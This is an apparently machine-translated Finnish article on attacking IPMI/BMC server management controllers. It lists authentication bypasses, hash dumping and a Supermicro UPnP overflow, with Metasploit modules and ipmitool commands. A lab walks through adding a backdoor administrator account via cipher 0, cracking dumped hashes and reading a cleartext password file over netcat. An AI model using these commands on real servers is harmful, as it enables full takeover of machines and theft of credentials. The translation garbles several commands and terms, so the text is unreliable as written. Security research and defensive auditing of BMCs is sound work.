Pääsy IPMI/BMC:hen käyttöjärjestelmällä maksimioikeuksin on mahdollista ilman salasanaa, eli valtuutusta ei tarvita ollenkaan. Tässä tapauksessa hyökkääjä yksinkertaisesti luo järjestelmänvalvojan IPMl/BMC-tilin. Jos hän menettää pääsyn palvelimeen, hän menee IPMl/BMC:hen ja palauttaa rehellisesti ansaitsemansa tavarat. Yleisesti ottaen IPMl/BMC:n ja päätietokoneen välistä yhteyttä ei ole vielä perusteellisesti tutkittu. Tämä on kyntämätön kenttä virheiden ja ominaisuuksien etsimiseen. Kun otetaan huomioon niiden toimittajien määrä, jotka toteuttavat tämän palvelimillaan, voimme puhua "rikkaasta sisäisestä maailmasta".

JULKINEN TUTKIMUS

Dan Farmer kiinnitti ensimmäisenä huomion IPMI:n ja IUD:n turvallisuuteen. Hänen täydellisen raportinsa, osuvasti otsikolla Freight Train to Hell. Tarkastelemme mielenkiintoisimpia kohtia hakkeroinnin näkökulmasta.
Danin tutkimuksen perusteella IPMl/BMC-haavoittuvuudet voidaan jakaa kahteen laajaan luokkaan:

· valmistajien mukautetut bugit (esimerkiksi verkkokäyttöliittymän haavoittuvuudet);
· IPMI-protokollan haavoittuvuudet.

Itse asiassa Dan kaivoi esiin paljon mielenkiintoisia asioita, lisää siitä alla.

NULL-todennus

Kuvaus
Haavoittuvuuden avulla voit ohittaa todennuksen. Esiintyy vain IPMI 1.5:ssä. Käyttö mahdollistaa laitteen hallinnan yksinkertaisesti aktivoimalla todennuksen poistamisen käytöstä. Oikeudet vaihtelevat toimittajien välillä, mutta ovat yleensä enimmäismääriä.

Myyjät
- HP
- Dell
- Supermicro.

ehdot
Avaa portti UDP 623, IPMI 1.5, olemassa olevan käyttäjän kirjautuminen.

Ipmtiool -A EI MITÄÄN -H targetIP bmc opas

IPMI-todennuksen ohitus salauksen 0 kautta

Kuvaus
Haavoittuvuuden avulla voit ohittaa todennuksen. Virhe ilmestyi IPM-versiossa I
2.0. Tässä versiossa päätimme lisätä salauksen. Toimiaksesi tarvitset
tietää, että kirjautuminen on voimassa tili, mutta sinun ei tarvitse tietää salasanaa -
voit määrittää minkä tahansa.

Myyjät
- HP
- Dell
- Supermicro.

ehdot

Avaa portti UDP 623, IPMI 2.0, olemassa olevan käyttäjän kirjautuminen.

Metasploit - apu/skanneri/ipmi/ipmi_cipher_zero ipmitool -I lanplus -C 0 -H targetIP -u Järjestelmänvalvoja -P mikä tahansa salasana tässä käyttäjäluettelo

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

Kuvaus
Haavoittuvuuden ansiosta luvaton käyttäjä voi hankkia tiivistettyjä salasanoja myöhempää raakaa voimaa varten. Virhe ilmestyi IPMI-määritysversiossa 2.0

Myyjät
- HP
- Dell;
- Supermicro.

EHDOT

Avaa portti UDP 623, IPMI 2.0 ja kelvolliset käyttäjätunnukset.

Metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes http://fish2.com/ipmi/tools/rak-the-ripper.pl

IPMI Anonymous Authentication / Null user

Kuvaus
Jotkut kutsuvat sitä nollakäyttäjäksi, toiset kutsuvat sitä nimettömäksi todentamiseksi. Jotkut jakavat nämä kaksi haavoittuvuutta, toiset eivät. Oletuksena on null user/anonymous - "" (tyhjä merkkijono). Jos he sanovat null user, hänen salasanansa on myös tyhjä. Jos he sanovat anonyymin todennuksen, hänen passinsa on admin ja kaikki IPMI-sirut ovat ATEN-ohjelmiston vika.
Dan pitää tutkimuksessaan näitä kahta erilaista haavoittuvuutta. Ja Rapid7:n dokumentissa ei ole enää sanaakaan null-käyttäjästä.

Myyjät:

HP
Dell
Supermicro (käytä IPMI-siruja ATEN-ohjelmiston kanssa).

ehdot

Avaa UDP-portti 623.

Metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes ipmitool -I lanplus -H targetIP -U "" -P "" käyttäjäluettelo

Supermicro IPMI UPnP -haavoittuvuus

Kuvaus
Supermicrossa on UPnP SSDP -palvelu päällä UDP-portti 1900. Se on alttiina puskurin ylivuodolle.

Myyjät
Supermikro.

ehdot
Avaa portti 1900.

Metasploit exploit/multi/upnp/libupnp _ssdp_overflow metasploit auxiliary/scanner/upnp/ssdp_msearch

Supermicro IPMI Clear text -salasanat

Kuvaus
IPMI 2.0 -spesifikaatio tarkoittaa, että selväkieliset salasanat on tallennettava jonnekin. Supermicrossa ne sijaitsevat /nv/PSBlock- tai /nv/PSStore-tiedostoissa laiteohjelmistosta riippuen.
Lisäksi Nuvoton WPCM450:n Navy-toteutuksissa TCP-portissa 49152 on palvelu, jonka avulla voit lukea /nv-hakemiston tiedostojen sisällön, esimerkiksi PSBlock, server.pem ja niin edelleen.

Myyjät
· Supermicro.

ehdot
Shell pääsy

Cat /nv/PSBlock echo (GET /PSBlock" 1 nc targetIP 49152

Mitä tulee haavoittuvuuksiin "NULL-todennus / IPMI-todennuksen ohitus salaus O:n kautta", "IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval", "IPMI Anonymous Authentication" - kaikki tämä on kirjoitettu IPMI-määrityksessä.
Tutkijat ovat tutkineet sitä perusteellisesti, keskittyen todennus- ja salausmekanismeihin. Supermicro-laiteohjelmiston UPnP-palvelun mielivaltaisen koodin suorittamisen haavoittuvuus (Supermicro IPMI UPnP Vulnerability) viittaa CVE-2012-5958:aan (BoF in libupnp). Loput käsittelemistämme haavoittuvuuksista löydettiin analysoimalla Supermicro X9 -emolevyjen Supermicro-laiteohjelmistoa, ja painopiste oli nimenomaan verkosta vastaavan koodin analysoinnissa.

HANDS-ON LAB

Katsotaanpa standardimallia IPMI-haavoittuvuuksien hyödyntämiseksi.
Voit skannata verkon kehää käyttämällä ipmi_version-moduulia, joka on saatavilla tunnetussa Metasploit-kehyksessä. Jos olet jo sisäisessä segmentissä, etkä voi asentaa/käyttää Metasploitia, voit pärjätä yksinkertaisella ipmiping- tai rmcpping-apuohjelmalla.
Kun olet löytänyt avoimet IPMI:t, sinun tulee ensin tarkistaa ne "Authentication Bypass via Cipher O" -haavoittuvuus (katso yllä). Jos se on olemassa, voit tehdä ilman käyttäjän hajautusten poistamista ja yksinkertaisesti nollata järjestelmänvalvojan salasanan tai lisätä omasi. Tärkeää: Jotta voit hyödyntää tätä haavoittuvuutta, sinun on tunnettava tilisi lokit; meidän tapauksessamme tilillä on oltava järjestelmänvalvojan oikeudet. Tarkastellaanpa ensin käyttäjän hash-vedosta ja sitä seuraavaa raakaa voimaa.

Metasploit-moduulin käyttäminen ipmi_dumphashes meillä on kyky kerätä käyttäjätiivisteitä. Tärkeää: ilman käyttäjän kirjautumistunnusta ei ole mahdollista saada hänen hashiaan. Vaihtoehdoissa ipmi_dumphashes voit määrittää tiedoston polun sisäänkirjautumisilla, esimerkiksi jos järjestelmänvalvojat ovat luoneet itselleen tilit. Oletustiedosto sisältää kaikkien toimittajien oletuskirjautumistunnukset. Brute hash on tuettu oclHashcat ja John the Viiltäjä jumbo-korjaukset (yhteisöpainos). John pitäisi ottaa Githubista, koska virallisella verkkosivustolla vanhentunut versio ilman tarvitsemamme muodon tukea. Uusin versio oclHashcat, tällä hetkellä 1.30, tukee kaikkea valmiina.

Jos sinulla on HP ilO4:n hash käsissäsi, olet onnekas. Tosiasia on, että kun se on määritetty tehtaalla, järjestelmänvalvojan tilin oletussalasana on kahdeksan merkkiä pitkä - isot kirjaimet + numerot. Vaatimattomilla resursseillani tällaisen arvon etsiminen kestää noin puoli tuntia.

Jos on haavoittuvuus salaus Tietoja Voit tehdä ilman raakoja tiivisteitä ja nollata salasanasi. Tätä varten tarvitsemme IPMitool-apuohjelman. Rakentaminen GNU/Linuxille ei herätä kysymyksiä. Mutta Windowsin alla sinun täytyy tanssia tamburiinin kanssa Cygwin. Toimintojärjestys järjestelmänvalvojan lisäämiseksi on seuraava:

1. Tarkastelemme paikalla olevia käyttäjiä ja käytämme seuraavaa ilmaista tunnusta.

Ipmitool -I lanplus -с 0 -H 1.1.1.1 -U Administrator -Р mikä tahansa salasana tässä käyttäjäluettelo

2. Aseta käyttäjätunnuksemme.

Ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U Järjestelmänvalvoja -P mikä tahansa salasana tässä käyttäjäjoukon nimi hakkeri

3. Aseta sille salasana.

Ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U Järjestelmänvalvoja -P mikä tahansa salasanatässä käyttäjän asettama salasana hakkeripassi

4. Tee hänestä järjestelmänvalvoja.

Ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U Järjestelmänvalvoja -Р anypasswordthere user priv 4

5. Aktivoi äskettäin luotu tili.

Ipmitool -I lanplus -C 0 -H 1.1.1.1 -U järjestelmänvalvoja -P mikä tahansa salasanatässä käyttäjä käytössä

Kun tiivisteet on murrettu, salasanat nollattu tai uusi järjestelmänvalvoja on lisätty, sinulla on mahdollisuus kirjautua sisään verkkoliittymän kautta, SSH:n kautta SMASHiin tai muodostaa yhteys etätyöpöytään, a la KVM:iin.
KVM-kytkin on erityisen arvokas, koska se tarjoaa pääsyn suoraan itse konsoliin, jolloin voit käyttää BIOSia, asentaa käyttöjärjestelmän ja muita vastaavia. Toteutusta varten KVM-kytkin Jokainen myyjä on vastuussa. Esimerkiksi HP:ssa
ilO4 käyttää tähän TCP-portteja 17988 ja 17990. Dell iDRAC7 käyttää TCP-porttia 5900. Cisco ICM TCP-porttia 2068.

On syytä mainita sellainen asia kuin HP BladeSystem Onboard Administrator. HP BladeSystem on kotelo, johon blade-palvelimet on kytketty. Joten tämän kotelon avulla voit hallita keskitetysti korttipalvelimia IPMI:n avulla. Tässä tapauksessa "Slave" IPMI:n valtuutus tapahtuu SSO-mekanismin avulla. Sinun tarvitsee vain hankkia järjestelmänvalvojan oikeudet omaavan käyttäjän hash ja käyttää verkkokäyttöliittymää yhteyden muodostamiseen sinua kiinnostavaan palvelimeen.

Toinen mielenkiintoinen ominaisuus, joka löytyy HP il04:stä, on kyky muodostaa yhteys palvelimeen KVM:n kautta suoraan SMASH:sta (lue: SSH) TEXTCONS-komennolla. Tämä on varsin hyödyllistä, kun portit 80, 443, 17990. Tarvitset järjestelmänvalvojan oikeudet tehdäksesi tämän, mutta ketä kiinnostaa?
Ylläpitäjäksi tuleminen ei ole niin vaikeaa. Henkilökohtaisesti sinulle, lukija, olen valmistellut ipmicd-ohjelman C:ssä Windows/Linuxille. Sen avulla voit skannata useita osoitteita IPMl/BMC:n esiintymisen varalta sekä tyhjentää tiivisteitä (analogisesti kuin Metasploitin ipmi_dumphashes). Ohjelmat on luotu tilanteisiin, joissa Metasploitin käyttö ei ole paras idea, esimerkiksi IPMl/BMC:t sijaitsevat jossain kaukana, missä Metasploitia ei voi lähettää eteenpäin.

Apuohjelma on saatavilla GitHubista. Erittäin helppokäyttöinen:

1. Parametria -p käytetään, kun on tarpeen tarkistaa tietty alue.
2. Parametri -d määrittää, hankitaanko tiivistetty salasana.
3. Parametri -v N ilmaisee kirjaamisen asteen käytön aikana, 0...5. Kun N = 1, ohjelma tuottaa sormenjälkiä.

Yhdistämällä erilaisia ​​parametreja voit vaikuttaa ohjelman toimintaan. Esimerkiksi käytettäessä valitsimia -d ja -p yhdessä, ohjelma yrittää saada tiivisteitä vain niistä järjestelmistä, jotka vastaavat IPMl-ping-kutsuihin. Vain -d-vaihtoehdon käyttäminen yrittää saada tiivisteet kaikista osoitteista, mikä on yleensä uskomattoman hidasta. Jos jokin on epäselvä, voit käyttää -v 5 -vaihtoehtoa - ohjelma näyttää vastaanotetut viestit kätevässä muodossa. Kääntääksesi Linuxin alla tarvitset vain GCC - gcc ipmicd.c -static -o ipmicd. Jos käytät Windowsissa, käännä käyttämällä MinGW:tä gcc ipmicd.c -mno-ms-bitfields -lws2_32 -DMINGW.

PÄÄTELMÄ

Muutama sana korkeasta: eri IPMl/BMC-toimittajien ominaisuuksien ja toteutusten tutkiminen on vasta alkamassa. Tämä voi sisältää verkkorajapintojen tai SMASHin lisäksi myös ajurit käyttöjärjestelmät, jonka avulla voit olla vuorovaikutuksessa IPMI/BMC-palvelimen etähallinnan teknologioiden kanssa asennetusta järjestelmästä. Sisäiset palvelut, jotka toteuttavat tiedonvaihdon IPMl/BMC:ssä. Jopa itse laivaston "laitteisto"-toteutus ja kuinka se tarkalleen ohjaa pääpalvelinta, voidaan kohdistaa. Suosittelen, että järjestelmänvalvojat tarkistavat kaikki järjestelmänsä julkisten haavoittuvuuksien varalta ja mahdollisuuksien mukaan poistavat nämä haavoittuvuudet. Tärkein suositus, jonka haluan antaa lukijalle, on kiinnittää mahdollisimman paljon huomiota ohjaamiesi laitteiden asetuksiin.